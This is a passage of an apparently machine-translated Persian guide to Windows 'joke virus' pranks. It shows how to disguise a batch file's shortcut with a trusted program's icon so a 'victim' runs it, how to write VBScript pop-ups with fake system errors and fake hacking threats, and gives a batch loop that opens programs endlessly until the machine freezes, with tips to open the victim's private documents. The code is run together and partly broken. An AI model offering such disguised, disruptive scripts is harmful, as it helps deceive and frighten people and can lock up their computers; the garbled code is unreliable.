    کاربر را مجبور کنید فایل را باز کند.برای اینکه شوخی شما کار کند، باید "قربانی" را برای شروع آن جذب کنید. می توان به این امر دست یافت راه های مختلف. یکی از کارآمدترین آنها این است که یک میانبر برای فایل دسته ای خود ایجاد کنید و نماد آن را به چیزی که کاربر واقعاً استفاده می کند تغییر دهید، سپس نام میانبر را برای مطابقت با نماد تغییر دهید. بنشینید و نتایج خود را از راحتی روی صندلی خود تماشا کنید!

    نحوه نوشتن .VBS با پیام باگ یا هک

    Notepad را اجرا کنید.همانطور که در جوک قبلی، در این یکی نیز باید در Notepad چند بنویسید دستورات ساده. با این حال، این بار اثر متفاوت خواهد بود - این شوخی به جای باز کردن پنجره ها، چندین پیغام خطا ایجاد می کند که باعث می شود کاربر فکر کند در عملکرد سیستم عامل خطایی رخ داده است یا رایانه هک شده است.

    "x=msgbox("Message Body", 5+16, "Message Title") را دقیقاً همانطور که در اینجا نشان داده شده است، شامل پرانتز و علامت نقل قول تایپ کنید و هر متنی را که می خواهید جایگزین "Message Body" و "Message Title" کنید. این دستور پنجره گفتگوی استاندارد را باز می کند خطاهای ویندوزبا پیغام خطا و عنوان پنجره ای که مشخص کردید. برای اینکه شوخی خود را باورپذیر کنید، از پیام ها و تیترهایی استفاده کنید که شبیه واقعی هستند. به عنوان مثال، "خطای ترمینال" را به عنوان عنوان و "یک مشکل بحرانی در دایرکتوری C://Users/Windows/system32 شناسایی شده است" را به عنوان پیام امتحان کنید.

    • ممکن است بخواهید شوخی خود را در جهت هک توسعه دهید. در این مورد، از پیام هایی مانند: "دارم دسترسی کاملبه سیستم شما برای نفوذ آماده شوید." هیچ‌کدام از این‌ها واقعاً اتفاق نمی‌افتد، بنابراین فقط با افرادی که با رایانه خوب نیستند کار می‌کند.
    • عبارت "5+16" به رایانه می گوید که یک کادر محاوره ای با نماد خطای بحرانی و دو دکمه "تکرار مجدد" و "لغو" ایجاد کند. با تغییر این اعداد می توان دریافت انواع متفاوتخطای ویندوز به سادگی هر عدد یک رقمی را به جای 5 و هر عدد دو رقمی را به جای 16 از اعداد زیر جایگزین کنید:
      • 0 (دکمه OK)
      • 1 (دکمه های OK و Cancel)
      • 2 (دکمه‌های لغو، انجام مجدد و پرش)
      • 3 (دکمه های بله، خیر و لغو)
      • 4 (دکمه های بله و خیر)
      • 5 (دکمه های Redo و Cancel)
      • 16 (نماد خطای بحرانی)
      • 32 (نماد راهنما)
      • 48 (نماد هشدار)
      • 64 (نماد اطلاعات)
  • پیام خطا را تا جایی که دوست دارید تکرار کنید.دستورات بالا را هر چند بار که دوست دارید با هر پیام خطایی تکرار کنید. پیام ها یکی پس از دیگری ظاهر می شوند، یعنی به محض اینکه کاربر یک پیام را ببندد، پیام دیگری باز می شود. شما می توانید از این واقعیت برای ایجاد یک پیام طولانی که بیشتر و بیشتر فوری می شود استفاده کنید.

    سند را به عنوان یک فایل ویژوال بیسیک (VBA) ذخیره کنید.پس از وارد کردن تمام پیام های مورد نظر، فایل را ذخیره کنید. از منوی Notepad، را انتخاب کنید فایل > ذخیره به عنوان...، به فایل خود یک نام با پسوند ".vba" بدهید. حتماً از لیست کشویی «نوع فایل» «همه فایل‌ها» را انتخاب کنید. حال برای اینکه جوک موفق شود، باید «قربانی» را برای اجرای این فایل، مثلاً با استفاده از ترفند روش 1، به دست آورید.

    استفاده از یک فایل دسته ای از پیش نوشته شده

    Notepad را اجرا کنید.این جوک از دستورات Notepad استفاده می کند تا رایانه برنامه ها را به طور تصادفی باز کند تا زمانی که فایل دسته ای غیرفعال شود یا رایانه مسدود شود. برای انجام این شوخی کافیست دستورات داده شده در این قسمت را کپی و پیست کنید. با این حالتوجه داشته باشید که این روی همه رایانه ها کار نمی کند.

    دستورات زیر را کپی و پیست کنید:@echo offclsbegingoto %random%:1start cmd.exegoto begin:2start mspaint.exegoto begin:3start pinball.exegoto begin:4start iexplore.exegoto begin:5start explorer.exegoto begin:6start solitaire.exegoto begin:7start explorer.exegoto begin: edit.exegoto start:9start iexplore.exegoto begin:0start mspaint.exegoto start

  • این دستورات را مطابق میل خود تغییر دهید.این کد به طور تصادفی برنامه های لیست شده پس از کلمه "شروع" را به طور نامحدود باز می کند. شاید متوجه شده باشید که برخی از برنامه ها تکراری هستند. لیست برنامه ها را به دلخواه خود تغییر دهید.

    • توجه داشته باشید که نام برخی از برنامه های ذکر شده در بالا ممکن است برای برخی از ماشین ها صحیح نباشد، به عنوان مثال، برخی از ماشین ها ممکن است "pinball.exe" نداشته باشند. قبل از انتقال ویروس جوک به رایانه قربانی، باید صحت نام برنامه ها را دوباره بررسی کنید.
    • اگر در مورد نام برنامه ای شک دارید، به یاد داشته باشید که مسیر دقیق برنامه نیز مناسب است. به عنوان مثال، به جای "iexplore.exe" می توانید "C:\Program Files\Internet Explorer" را بنویسید.
  • متن را به عنوان یک فایل دسته ای ذخیره کنید و آن را اجرا کنید (اگر جرات دارید).فایل را با پسوند "bat." با انتخاب "All Files" از لیست کشویی "File Type" ذخیره کنید. وقتی موفق می‌شوید کاربر را وادار به اجرای آن کنید، آنها به‌طور تصادفی بدون توقف برنامه‌ها را روی رایانه باز می‌کنند.

    • برای لذت بیشتر، سعی کنید "*.exe" را در یکی از دستورات با مسیر کامل برخی از اسناد کاربر جایگزین کنید. به عنوان مثال، "start C:\Documents\123.doc" سند 123.doc را از پوشه Documents در ویرایشگر پیش فرض باز می کند، و
      ویرایش (نام کامل فایل)
      باید شروع کنم
      فایل مشخص شده را در یک ویرایشگر متن DOS باز می کند. به نظر می رسد که هکر در حال خواندن اسناد خصوصی است. به یاد داشته باشید که نام فایل حاوی فاصله باید در علامت نقل قول قرار داده شود!